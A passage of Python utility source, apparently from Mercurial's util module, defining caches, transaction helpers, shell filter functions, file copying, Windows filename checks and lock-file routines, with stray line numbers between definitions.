            if isinstance(src, dict):
                src = src.iteritems()
            for name, val in src:
                self[name] = val
944 944
class cowdict(cow, dict):
    """copy-on-write dict

    ``copy()`` is cheap and returns the very same object; the real copy is
    made by ``preparewrite()``. Be sure to call d = d.preparewrite() before
    writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
970 970
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Combines the ``cow`` helpers with ``sortdict``. Be sure to call
    d = d.preparewrite() before writing to d.
    """
976 976
class transactional(object):
    """Base class for making a transactional type into a context manager.

    Leaving the ``with`` block without an exception calls ``close()``;
    ``release()`` is called in every case.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            # runs even when close() itself raises
            self.release()
1001 1001
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    The transaction is closed when the body finishes normally or raises
    error.InterventionRequired (which is re-raised), and it is released in
    every case.

    If no transaction was provided, this simply runs the body and returns
    """
    if tr:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            tr.close()
            raise
        finally:
            tr.release()
    else:
        yield
1019 1019
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing: the body simply runs."""
    yield
1023 1023
class _lrucachenode(object):
    """A node in a doubly linked list.

    Carries links to both neighbours plus the key/value pair of the
    dictionary entry it represents. A node whose key is ``_notset`` is
    considered empty.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = self.prev = None
        self.value = None
        # a fresh node starts out empty
        self.markempty()

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1042 1042
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Nodes emptied by ``del`` stay in the list; they are parked at the
    oldest end (head.prev) so that they get recycled first.
    """
    def __init__(self, max):
        """Create an empty cache that holds at most ``max`` entries."""
        self._cache = {}

        # The list starts with a single empty node linked to itself.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        """Return the value for ``k`` and mark it as most recently used.

        Raises KeyError when ``k`` is not cached.
        """
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        """Store ``v`` under ``k`` as the newest entry.

        When the cache is at capacity the oldest node is recycled.
        """
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        """Remove ``k``; its node is emptied and becomes the oldest one.

        Raises KeyError when ``k`` is not cached.
        """
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k`` or ``default``.

        Unlike ``__getitem__`` this does not change the entry's position.
        """
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """Empty every node and forget all keys; the nodes are kept."""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same capacity and entries.

        Entries are inserted oldest first so that the copy ends up with
        the same recency order as the original.
        """
        result = lrucachedict(self._capacity)

        # Nodes emptied by __delitem__ are parked at the oldest end of the
        # list. Skip them: starting on one would insert the _notset
        # sentinel as a key and leave out the newest real entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1201 1201
def lrucachefunc(func):
    '''cache most recent results of function calls

    Results are keyed by the positional argument(s). Before a new result
    is stored, the least recently used one is dropped if more than 20
    results are already held.
    '''
    results = {}
    recency = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in results:
                recency.remove(arg)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[arg] = func(arg)
            recency.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args in results:
                recency.remove(args)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[args] = func(*args)
            recency.append(args)
            return results[args]

    return f
1228 1228
class propertycache(object):
    """descriptor that computes a value and stores it in the instance

    The wrapped function is called with the instance and its result is
    written into the instance's __dict__ under the function's name.
    """
    def __init__(self, func):
        self.func, self.name = func, func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        """store value on obj under the property's name"""
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1241 1241
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # pop() with a default is a no-op when nothing is stored under prop
    obj.__dict__.pop(prop, None)
1246 1246
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output

    CMD is run through the shell; S is fed to its stdin and whatever it
    writes to stdout is returned.
    '''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # stderr is not piped, so only the first element carries data
    return proc.communicate(s)[0]
1253 1253
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.

    Raises Abort when the command reports failure. Both temporary files
    are removed before returning.'''
    inname = outname = None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        infp = os.fdopen(infd, pycompat.sysstr('wb'))
        infp.write(s)
        infp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname).replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of whichever files were actually created
        for tmpname in (inname, outname):
            if not tmpname:
                continue
            try:
                os.unlink(tmpname)
            except OSError:
                pass
1287 1287
# Maps a command prefix to the function implementing that kind of filter.
# filter() strips the matching prefix from the command before calling it.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
1292 1292
def filter(s, cmd):
    """filter a string through a command that transforms its input to its output

    A command starting with one of the filtertable prefixes is handed,
    minus that prefix, to the matching function; anything else goes to
    pipefilter.
    """
    for prefix, handler in filtertable.iteritems():
        if not cmd.startswith(prefix):
            continue
        return handler(s, cmd[len(prefix):].lstrip())
    return pipefilter(s, cmd)
1299 1299
def binary(s):
    """return true if a string is binary data

    Data counts as binary when it contains a NUL character; empty or
    missing data never does.
    """
    if not s:
        return False
    return '\0' in s
1303 1303
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max

    source is an iterable of strings; whatever is left over when it is
    exhausted is yielded as a final, possibly shorter, chunk.'''
    def log2(x):
        # index of the highest set bit; 0 for an input of 0
        return x.bit_length() - 1 if x else 0

    pending = []
    size = 0
    for chunk in source:
        pending.append(chunk)
        size += len(chunk)
        if size < min:
            continue
        if min < max:
            min <<= 1
            # jump ahead when the data just gathered is already larger
            floor = 1 << log2(size)
            if floor > min:
                min = floor
            if min > max:
                min = max
        yield ''.join(pending)
        pending, size = [], 0
    if pending:
        yield ''.join(pending)
1334 1334
# Alias for error.Abort; functions in this module (e.g. tempfilter and
# copyfile) raise it through this name.
Abort = error.Abort
1336 1336
def always(fn):
    """return True whatever fn is (the argument is ignored)"""
    return True
1339 1339
def never(fn):
    """return False whatever fn is (the argument is ignored)"""
    return False
1342 1342
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still
    affects CPython's performance.

    Returns a wrapper around func that runs it with the collector turned
    off and turns it back on afterwards if it was on before the call.
    """
    def wrapper(*args, **kwargs):
        if not gc.isenabled():
            # already off: nothing to disable and nothing to restore
            return func(*args, **kwargs)
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            gc.enable()
    return wrapper
1365 1365
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    # so the decorator becomes an identity function there: decorated
    # callables are returned unchanged.
    nogc = lambda x: x
1369 1369
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    src, dst = splitpath(n1), n2.split('/')
    # length of the leading run of components shared by both paths
    common = 0
    limit = min(len(src), len(dst))
    while common < limit and src[common] == dst[common]:
        common += 1
    ups = ['..'] * (len(src) - common)
    return pycompat.ossep.join(ups + dst[common:]) or '.'
1395 1395
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    frozen = safehasattr(sys, "frozen")  # new py2exe
    if not frozen:
        frozen = safehasattr(sys, "importers")  # old py2exe
    if not frozen:
        frozen = imp.is_frozen(u"__main__")  # tools/freeze
    return frozen
1405 1405
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    # otherwise (including a 'macosx_app' frozen build) use the directory
    # holding this module
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# Cached result of hgexecutable(); None until it has been determined.
_hgexecutable = None
1416 1416
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The answer is worked out on the first call and remembered in the
    module-level _hgexecutable afterwards.
    """
    if _hgexecutable is not None:
        return _hgexecutable

    hg = encoding.environ.get('HG')
    mainmod = sys.modules[pycompat.sysstr('__main__')]
    if hg:
        path = hg
    elif mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            path = encoding.environ['EXECUTABLEPATH']
        else:
            path = pycompat.sysexecutable
    elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
        path = pycompat.fsencode(mainmod.__file__)
    else:
        path = findexe('hg') or os.path.basename(sys.argv[0])
    _sethgexecutable(path)
    return _hgexecutable
1440 1440
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # rebinds the module-level cache that hgexecutable() returns
    global _hgexecutable
    _hgexecutable = path
1445 1445
def _isstdout(f):
    """tell whether f's file descriptor is the one of sys.__stdout__

    An object without a (truthy) fileno attribute yields that falsy
    attribute value; an object whose fileno() raises
    io.UnsupportedOperation yields False.
    """
    fileno = getattr(f, 'fileno', None)
    if not fileno:
        return fileno
    try:
        return fileno() == sys.__stdout__.fileno()
    except io.UnsupportedOperation:
        return False # fileno() raised UnsupportedOperation
1452 1452
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out

    The result is a copy of encoding.environ updated with the entries of
    environ (values converted for the shell) and with HG set to the
    location of the hg executable.
    """
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return pycompat.bytestr(val)

    env = dict(encoding.environ)
    if environ:
        for key, value in environ.iteritems():
            env[key] = py2shell(value)
    env['HG'] = hgexecutable()
    return env
1467 1467
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.

    returns the exit status of the command.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is not None and not _isstdout(out):
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        # forward the combined output line by line until end of file
        while True:
            line = proc.stdout.readline()
            if line == '':
                break
            out.write(line)
        proc.wait()
        rc = proc.returncode
    else:
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1494 1494
def checksignature(func):
    '''wrap a function with code to check for calling errors

    A TypeError whose traceback is a single frame deep is turned into
    error.SignatureError; any other TypeError is re-raised untouched.'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) != 1:
                raise
            raise error.SignatureError

    return check
1506 1506
# a whitelist of known filesystems where hardlink works reliably
# (copyfile() only hardlinks when the destination's filesystem type is
# listed here)
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1522 1522
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.

    An existing dest is removed first. With hardlink set, a hardlink is
    attempted when dest lives on a whitelisted filesystem, falling back
    to a regular copy if that is not possible.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype in _hardlinkfswhitelist:
            try:
                oslink(src, dest)
                return
            except (IOError, OSError):
                pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
        return
    try:
        shutil.copyfile(src, dest)
        if copystat:
            # copystat also copies mode
            shutil.copystat(src, dest)
        else:
            shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
    except shutil.Error as inst:
        raise Abort(str(inst))
1574 1574
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    When hardlink is None, linking is tried if source and destination are
    on the same device. progress is called with a topic and the running
    file count, and finally with a position of None.

    Returns a (hardlink, num) tuple: whether linking was still in use at
    the end, and the number of files handled.
    """
    num = 0

    def gettopic():
        return hardlink and _('linking') or _('copying')

    def nprog(t, pos):
        # offset the positions reported by a recursive call by the number
        # of files handled so far at this level
        if pos is not None:
            return progress(t, pos + num)

    isdir = os.path.isdir(src)
    if hardlink is None:
        probe = src if isdir else os.path.dirname(src)
        hardlink = (os.stat(probe).st_dev ==
                    os.stat(os.path.dirname(dst)).st_dev)
    topic = gettopic()

    if isdir:
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: copy, and stop trying to link
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1614 1614
# Names checkwinfilename() rejects; it compares them with the lowercased
# part of each path component that precedes the first '.'.
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# Characters checkwinfilename() rejects anywhere in a path component.
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # both kinds of slash separate components
    for component in path.replace('\\', '/').split('/'):
        if not component:
            continue
        for char in _filenamebytestr(component):
            if char in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % char
            if ord(char) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(char)
        # only the part before the first dot counts for reserved names
        base = component.split('.', 1)[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        last = component[-1:]
        if last in '. ' and component not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % last
1667 1667
# Pick the filename checker and the default timer for this platform.
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# time.perf_counter takes precedence over either choice when it exists
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1677 1677
def makelock(info, pathname):
    """Create a lock file atomically if possible

    The lock is a symlink at pathname pointing at info. If the symlink
    cannot be created for a reason other than the path already existing,
    or os has no symlink, a regular file created with O_EXCL and
    containing info is used instead.

    Raises OSError (errno EEXIST) when the lock already exists.

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    try:
        os.write(ld, info)
    finally:
        # do not leak the descriptor when the write fails
        os.close(ld)
1695 1695
def readlock(pathname):
    """Return the info stored in the lock at pathname

    The target of the symlink is returned. If reading the link fails with
    EINVAL or ENOSYS, or os has no readlink, the content of the file at
    pathname is returned instead. Other OSErrors are propagated.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    try:
        return fp.read()
    finally:
        # close the file even when read() raises
        fp.close()
1708 1708
def fstat(fp):
    '''stat file object that may not have fileno method.

    Falls back to stat-ing fp.name when asking for the file descriptor
    raises AttributeError.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        return os.stat(fp.name)
    return os.fstat(fd)
1715 1715
1716 1716 # File system features
1717 1717
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.

    The final component is looked up again with its case changed; the
    filesystem is reported case-insensitive only when that lookup
    succeeds and yields the same stat result.
    """
    origstat = os.lstat(path)
    parent, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        return True # no evidence against case sensitivity
    try:
        foldedstat = os.lstat(os.path.join(parent, folded))
    except OSError:
        return True
    return not (foldedstat == origstat)
1740 1740
# _re2 is tri-state: None means re2 was imported but has not been checked
# yet (_re._checkre2() replaces it with a bool), False means re2 is not
# to be used.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1746 1746
class _re(object):
    """regular expression front end that uses re2 when it can"""

    def _checkre2(self):
        """settle the module-level _re2 flag by trying a match with re2"""
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        supported = remod.IGNORECASE | remod.MULTILINE
        if _re2 and not (flags & ~supported):
            # re2.compile is called without flags, so express them inline
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape
1789 1789
# Module-level instance of _re, providing re.compile() and re.escape.
re = _re()
1791 1791
# Maps a directory to a {normcase(entry): entry} dict of its contents.
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.

    Components that cannot be found in their directory are returned as
    given; separators are returned as given as well.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # The result has to be assigned back: str.replace() returns a new
    # string, and an unescaped backslash inside the character classes
    # below would escape the character after it instead of being matched
    # as a separator itself.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1834 1834
def checknlink(testfile):
    '''check whether hardlink count reporting works properly

    Two scratch files are created next to testfile, hardlinked to each
    other and then removed again. Returns False when any step raises
    OSError.'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    first = second = linkfp = None
    try:
        fd, first = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                     suffix='1~',
                                     dir=os.path.dirname(testfile))
        os.close(fd)
        # same name with the '1~' suffix swapped for '2~'
        second = first[:-2] + '2~'

        oslink(first, second)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        linkfp = posixfile(second)
        return nlinks(second) > 1
    except OSError:
        return False
    finally:
        if linkfp is not None:
            linkfp.close()
        for scratch in (first, second):
            if scratch is None:
                continue
            try:
                os.unlink(scratch)
            except OSError:
                pass
1863 1863
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    altsep = pycompat.osaltsep
    # a falsy altsep is returned as is
    return altsep and path.endswith(altsep)
1868 1868
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)
1876 1876
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    isgui = getattr(osutil, 'isgui', None)
    if isgui:
        # check if a CoreGraphics session is available
        return isgui()
    # pure build; use a safe default
    return True
1891 1891
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    The temporary file is created in the same directory as name. If name
    does not exist, the temporary file is left empty. If copying fails,
    the temporary file is removed and the error is re-raised.

    Returns the name of the temporary file.
    """
    dirname, basename = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % basename, suffix='~',
                                dir=dirname)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            infp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        outfp = posixfile(temp, "wb")
        for chunk in filechunkiter(infp):
            outfp.write(chunk)
        infp.close()
        outfp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1932 1932
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for ``path``; a missing file gives stat=None.

        Any OSError other than ENOENT is propagated.
        """
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object (via os.fstat)."""
        return cls(os.fstat(fp.fileno()))

    # defining __eq__ would otherwise disable hashing on Python 3
    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            # at least one side has no stat (or is not a filestat)
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
